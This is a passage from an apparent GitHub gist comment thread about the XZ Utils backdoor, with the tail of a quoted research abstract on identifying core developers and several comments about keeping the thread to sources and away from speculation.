and pull requests. In an empirical study on 25 GitHub projects, (1) we validate the set of automatically identified core developers
with a sample of project-reported developer lists, and (2) we use our set of identified core developers to assess the accuracy of
state-of-the-art unsupervised developer classification methods. Our results indicate that the set of core developers, which
we extracted from privileged issue events, is sound and the accuracy of state-of-the-art unsupervised classification methods
depends mainly on the data source (commit data vs. issue data) rather than the network-construction method (directed vs.
undirected, etc.). In perspective, our results shall guide research and practice to choose appropriate unsupervised classification
methods, and our method can help create reliable ground-truth data for training supervised classification methods.
"""
ref: https://www.se.cs.uni-saarland.de/publications/docs/BAJ+23.pdf

@calestyo
Copy link

calestyo commented Apr 14, 2024

I'm not the admin here (so obviously @thesamesam decides what this is about and not me), but I had the impression so far that this gist was primarily giving an overview/index/references to the XZ backdoor - not about actual in-depth discussion about the various fields (reverse engineering, OSint, etc. pp) related to it.

That was the nice thing about it, getting only really new/concrete stuff from it.

There do seem to be numerous places which are dedicated to in-depth discussion (and arguing ;-) ) like https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint).

@AdrianBunk
Copy link

I joint this discussion just by pointing out that the ultimate target for a supply chain attack will be the kernel.

That's nonsense.

Nothing you provided indicates that there was actually anything malicious submitted to the kernel, and it would be unbelievably stupid for the attacker to try to add more exploits since this would increase the risk that the openssh backdoor gets detected.

The openssh backdoor would have given the attacker remote administrator access to most Linux servers on the internet.
This is already the ultimate backdoor.

And here is not the right place for people to present whatever thoughts or theories they come up with, please do that in a more appropriate location.

@the-lne
Copy link

the-lne commented Apr 15, 2024 via email

@thesamesam
Copy link
Author

It makes my life a lot easier if the comment section here is kept for editorial changes I need to make, extra sources, etc.

Please keep theorising to other forums. Thanks!

@felipec
Copy link

felipec commented Apr 15, 2024

@thesamesam this is a good resource I think: https://github.com/felipec/xz-min.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment